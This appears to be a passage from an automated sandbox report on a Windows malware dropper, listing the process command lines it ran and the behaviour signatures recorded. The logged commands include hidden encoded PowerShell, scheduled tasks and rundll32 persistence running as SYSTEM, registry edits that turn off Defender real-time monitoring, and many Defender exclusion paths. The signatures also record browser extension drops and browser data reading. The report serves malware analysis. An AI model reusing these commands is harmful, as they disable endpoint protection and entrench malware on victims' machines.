C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gGPOIrlNR"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bWLKrWFeqGsUKIPSIT" /SC once /ST 23:07:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\IZVHwqqvKwOqTrb\QHhAKnF.exe\" KP /site_id 525403 /S" /V1 /F

C:\Windows\system32\taskeng.exe

taskeng.exe {EC6CFC43-B352-44AF-B53B-1AF5DE83BD95} S-1-5-18:NT AUTHORITY\System:Service:

C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\IZVHwqqvKwOqTrb\QHhAKnF.exe

C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\IZVHwqqvKwOqTrb\QHhAKnF.exe KP /site_id 525403 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gspWoPfEo" /SC once /ST 21:48:23 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gspWoPfEo"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gspWoPfEo"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gNzfrQBUu" /SC once /ST 10:16:39 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gNzfrQBUu"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gNzfrQBUu"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\cmd.exe

cmd /C copy nul "C:\Windows\Temp\grMXAHIUMHIHAuvw\frpukqJa\eqbdqfaWYhUUPtlL.wsf"

C:\Windows\SysWOW64\wscript.exe

wscript "C:\Windows\Temp\grMXAHIUMHIHAuvw\frpukqJa\eqbdqfaWYhUUPtlL.wsf"

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SvbbHukzU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SvbbHukzU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XYDCXZXPsTrrC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XYDCXZXPsTrrC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dVbwgRbTSJJLORWiduR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dVbwgRbTSJJLORWiduR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nolBHjueEzUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nolBHjueEzUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yOvDRBMJNKKU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yOvDRBMJNKKU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\YVKeAuHUOaLCRzVB" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\YVKeAuHUOaLCRzVB" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SvbbHukzU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SvbbHukzU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XYDCXZXPsTrrC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XYDCXZXPsTrrC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dVbwgRbTSJJLORWiduR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dVbwgRbTSJJLORWiduR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nolBHjueEzUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nolBHjueEzUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yOvDRBMJNKKU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yOvDRBMJNKKU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\YVKeAuHUOaLCRzVB" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\YVKeAuHUOaLCRzVB" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gYcgxhZvm" /SC once /ST 10:18:52 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gYcgxhZvm"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gYcgxhZvm"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "biFxKMwOTZzXEKwTU" /SC once /ST 10:45:42 /RU "SYSTEM" /TR "\"C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\UbWVVsy.exe\" NQ /site_id 525403 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "biFxKMwOTZzXEKwTU"

C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\UbWVVsy.exe

C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\UbWVVsy.exe NQ /site_id 525403 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bWLKrWFeqGsUKIPSIT"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\SvbbHukzU\TThBQi.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "HvGgydgoxkjNzSQ" /V1 /F

Network

N/A

Files


Analysis: behavioral2

Detonation Overview

Submitted

2022-10-31 22:05

Reported

2022-10-31 22:08

Platform

win10v2004-20220812-en

Max time kernel

148s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\file.exe"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zS7FF.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\rundll32.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS7FF.tmp\Install.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Reads user/profile data of web browsers

spyware stealer

Checks installed software on the system

discovery

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\IZVHwqqvKwOqTrb\rjhsLhD.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3B8C7C973B30115D9F846695C38BBC1F C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_7D7374C3BD488A38BC34DD9B008EDC62 C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_A49E2928C282F3D7B74BA1083F81B152 C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_A49E2928C282F3D7B74BA1083F81B152 C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\IZVHwqqvKwOqTrb\rjhsLhD.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_7D7374C3BD488A38BC34DD9B008EDC62 C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3B8C7C973B30115D9F846695C38BBC1F C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
File created C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\7zS7FF.tmp\Install.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
File created C:\Program Files (x86)\yOvDRBMJNKKU2\HtGLGFQ.xml C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
File created C:\Program Files (x86)\dVbwgRbTSJJLORWiduR\psjZEUM.dll C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
File created C:\Program Files (x86)\yOvDRBMJNKKU2\AhXIYJBhOvkEv.dll C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
File created C:\Program Files (x86)\XYDCXZXPsTrrC\EmzDSqI.xml C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
